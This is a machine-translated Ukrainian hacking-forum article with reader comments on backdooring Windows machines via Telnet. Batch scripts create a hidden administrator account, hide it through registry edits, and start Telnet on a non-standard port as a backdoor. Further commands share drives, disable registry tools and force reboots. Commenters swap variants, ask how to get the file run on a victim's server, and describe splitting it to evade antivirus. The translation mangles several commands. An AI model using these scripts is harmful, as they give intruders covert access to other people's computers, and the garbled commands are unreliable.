Злом через TELNET
Всім привіт! Все більше і більше я бачу, як новачки задають одні і ті ж питання на форумі, в чаті, в аськах, такі як: Що таке телнет? Як ним користуватися? Навіщо він потрібен? Тому я вирішив на допомогу їм написати цю статтю. У цій статті я спробую пояснити як за допомогою такого універсального сервісу, як телнет, можна проникнути в файлову систему віддаленого по мережі компа, і повністю керувати ним, віддаючи команди. Але перш ніж діяти давайте дізнаємося, що за така служба телнет.
Телнет - мережевий протокол для роботи в віддаленій системі в термінальному режимі (тобто режимі командного рядка). Все робиться "ручками", миші відпочивають, тільки текстовий обмін інформацією. Він один з найважливіших засобів, користуватися яким повинен навчитися кожен хакер перш, ніж він подумає про злом серверів. Цей протокол може бути використаний для підключення до віддалених комп'ютерів і запуску програм з командного рядка, просто вводячи команди в GUI вікні. Telnet не використовує ресурси клієнтської машини, але він використовує ресурси сервера, з яким з'єднався клієнт. В основному це програма, що емулює термінал, що дозволяє нам підключатися до віддалених комп'ютерів.
chcp тисячу двісті п'ятьдесят одна
net user SUPPORT_388945a0 / delete
net user hacker hack / add
net localgroup Адміністратори hacker / add
net localgroup Користувачі SUPPORT_388945a0 / del
regedit / s conf.reg
sc config tlntsvr start = auto
tlntadmn config port = 972 sec = -NTLM
net start Telnet
або так
chcp тисячу двісті п'ятьдесят одна
net user SUPPORT_388945a0 / delete
net user support hacker / add
net localgroup Адміністратори support / add
net localgroup Користувачі SUPPORT_388945a0 / del
reg add "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList" / v "support" / t reg_dword / d 0 y
sc config tlntsvr start = auto
tlntadmn config port = 972 sec = -NTLM
net start Telnet
все це пишеш в блокноті, і зберігаємо як * .bat
Так як при створенні нового адміна він буде видно в welcome screen'е, відключити його
можна імпортувавши рег файл до реєстру, такого змісту:
вміст conf.reg
Windows Registry Editor Version 5.00
Сервіс телнет за замовчуванням відключений, але є така команда
sc config tlntsvr start = auto
яка змінює тип його запуску на автоматичний (по дефолту disabled).
При запуску ТЕЛНЕТ, він ставиться на стандартний свій 23-ий порт, але на жаль це палевно, тому раджу прописувати цією командою tlntadmn config port = 972 sec = -NTLM. рідко використовуваний порт. У нашому випадку це 972. Ну ось все настройки і конфігурація сервісу завершена, і цей рядок net start Telnet остаточно запустить наш бекдор.
Тепер перевіримо чи правильний синтаксис коду. Відкриваємо командний рядок, якщо вона загубилася можна знайти її тут c: \ WINDOWS \ system32 \ cmd.exe. Вставляємо код, запускаємо і дивимося чи немає помилок. Переконатися що все ок, ще можна так:
Пуск -> Виконати -> пишемо services.msc -> Ok
Там ти бачиш запуск, зупинку і настройку служб Windows. Вибираєш Telnet, і дивишся її властивості. При необхідності в будь-який момент можна її відключити.
C:> net share disk_c = c:> nul
C:> net share disk_d = d:> nul
C:> net share disk_e = e:> nul
перезавантажити комп:
C:> shutdown -r -t 1 -c -f
прописати який-небудь ключ реєстру:
C:> reg add HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System / v DisableRegistryTools / t REG_DWORD / d 1 / f -
який заборонить доступ до нього
або підняти ftp сервер і залити радміна для більш зручного віддаленого адміністрування:
В общем-то, тут вже грає фантазія зломщика =)
Як бачиш, таку службу як Telnet можна недооцінювати, в досвідчених руках хакера це потужна зброя, здатне призвести до несанкціонованого доступу до дорогої в наш час інформації. Тому роби висновки, щоб захистити себе в інформаційному світі.
P.S. На всі незрозумілі терміни і вирази є Google.
а якщо жертва НЕ З МОЄЇ мережі то працювати тож буде?
Все нормально amenosky, так telnet і повинен працювати. Якщо пас не відображається це зовсім не означає, що він не передається віддаленого сервера. Просто вводіш логін і пас і тиснеш ентер, і все повинно бути окей.
Все добре написано, по більше б таких статей де все популярно розглянута.
Хлопці, та тут суцільні трояни)))
Це у нас джоінер такий, цікаво чи не так?
А це криптор. Ну HackTool це не страшно звичайно, але Trojan Dropper це вже занадто! Для довідки:
"Троянські програми цього класу написані з метою прихованої інсталяції інших програм і практично завжди використовуються для« підсовування »на комп'ютер-жертву вірусів або інших троянських програм.
Дані троянці зазвичай без будь-яких повідомлень (або з помилковими повідомленнями про помилку в архіві або невірній версії операційної системи) скидають на диск в будь-якої каталог (в корінь диска C. в тимчасовий каталог, в каталоги Windows) інші файли і запускають їх на виконання.
В результаті використання програм даного класу хакери досягають двох цілей:
- скритна інсталяція троянських програм і / або вірусів;
- захист від антивірусних програм, оскільки не всі з них в змозі перевірити всі компоненти всередині файлів цього типу. "
Все зробив як в статті, файл знаю сто відсотків запущений, який підсунув.
Але ось пише що.
Access Denied: Specified user is not a member of TelnetClients group.
Server administrator must add this user to the above group.
Telnet Server has closed the connection
Підключення до вузла втрачено.
Що робити? І чому?
Доступ заборонений: Користувач не є членом групи TelnetClients
Адміністратор сервера повинен додати цього користувача в зазначену групу
Telnet Server закрив з'єднання
Робити це, наприклад:
net localgroup TelnetClients hacker / add
Ймовірно, адміністраторам заборонений віддалений вхід телнетом. Однак, можна дозволити через gpedit
Народ, тут така проблема))) вобщем батник запускали на компі, але при спробі під'єднатися до нього з'являється такий напис:
Microsoft Telnet> o 10.10.244.248 972
Підключення до 10.10.244.248. Не вдалося відкрити підключення до цього вузла, на порт 972: Не вдається підключити
Плиз, допоможіть хто може.
а як IPшнік жертви дізнатися якщо ця мр ** ь НЕ мхочет ніяких листів тобі відсилати і висить тільки в Агента.
Перепрошую звичайно, я в цій справі просто прибери новачок))) але то що було написано раніше у мене не зовсім працювало. точніше не працювало щоб хакерський юзер був прихований при вході. можна було зробити щоб це робилося коли створюєш окремий файл реєстру, а ось через батник ніяк не виходив
Я зробив трохи по-іншому і вийшов ось такий ось батник, все працює:
chcp тисячу двісті п'ятьдесят одна
net user SUPPORT_388945a0 / delete
net user hacker hack / add
net localgroup Адміністратори hacker / add
net localgroup Користувачі SUPPORT_388945a0 / del
sc config tlntsvr start = auto
tlntadmn config port = 972 sec = -NTLM
net start Telnet
REG ADD "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList" / v hacker / t REG_DWORD / d 00000000
До речі намив прогу яка шифрує екзкшнік в картинку. тобто ніякого ехе розширення. ток вот опять проблема. не працює))) може хто знає і допоможе =) де прогу знайшов не пам'ятаю, лінк дати не можу. якщо кому цікаво стукайте в асю: 478449083. може разом розберемося.
Дякуємо.
Я щось не зрозумію, ця фішка діє не по мережі, а через інет?
Якщо так. то пов все канешно добре, але 972 порт треба прокидає на віддаленому комп'ютері, якщо він не прокинуть, то з'єднання не буде. Треба шукати відкритий і вільний порт, щоб прописати його в сорочки з короткими рукавами, або я щось не правильно зрозумів?
хлопці вибачте за настільки неймовірно наївне запитання, але як цей батник відправити і зробити так щоб його там запустили? це сервак, і там сидять злі адміни, з якими краще не жартувати! знаю тільки айпі. заздалегідь спс.
ВО прикол))))) пропустіть троя товариші до себе в довірену зону
НАРОД. Плиз допоможіть. все нормально, але як тільки вводиш login а потім password (його не відображує !!), пишит "Login Failed" "ім'я користувача і паролі не визначені". що робити.
ввожу ..
login: hacker
password: hack
Величезне спасибі за статтю.
Але є питання. На ХР все працює чудово. А ось на Vista я служби telnet не знайшов. Вона там є взагалі?
g0r1um тут справа в буквах. я жах скільки трахался з цим телнетом поки не допер що потрібно числові імена давати. в загальному постав ім'я користувача і пароль в числовому вигляді (не знаю чому але де то це працює а де то немає) і все повинно проканати
g0r1um тут справа в буквах. я жах скільки трахался з цим телнетом поки не допер що потрібно числові імена давати. в загальному постав ім'я користувача і пароль в числовому вигляді (не знаю чому але де то це працює а де то немає) і все повинно проканати
g0r1um тут справа в буквах. я жах скільки трахался з цим телнетом поки не допер що потрібно числові імена давати. в загальному постав ім'я користувача і пароль в числовому вигляді (не знаю чому але де то це працює а де то немає) і все повинно проканати
Всім привіт якщо можете підкажіть.
Я наприклад використовував Ось цей код:
chcp тисячу двісті п'ятьдесят одна
net user admin admin / add
net localgroup Адміністратори admin / add
sc config tlntsvr start = auto
tlntadmn config port = 23 sec = -NTLM
net start Telnet
REG ADD "HKLM \ SOFTWARE \ Microsoft \ Win
dowsNT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \ admin "/ v admin / t reg_d
word / d 0000000
у мене порт все одно не відкриває, че за нах не зрозумію, з сорочки з короткими рукавами поверхнево тільки знаком.
плюс ще цей батник каспер відразу ж палить, а ось якщо його на 4 батника розділити наприклад). все норм)))
Microsoft Telnet> o 10.10.244.248 972
Підключення до 10.10.244.248. Не вдалося відкрити підключення до цього вузла, на порт 972: Збій подключени
що за нах і че з цим робити?
така хрень навіть на моєму комп'ютері, коли перевіряю.
порт міняв, че то не допомагає (
допоможіть з сорочки з короткими рукавами під 7-ку. антивіруса немає. 7-ка максмімальная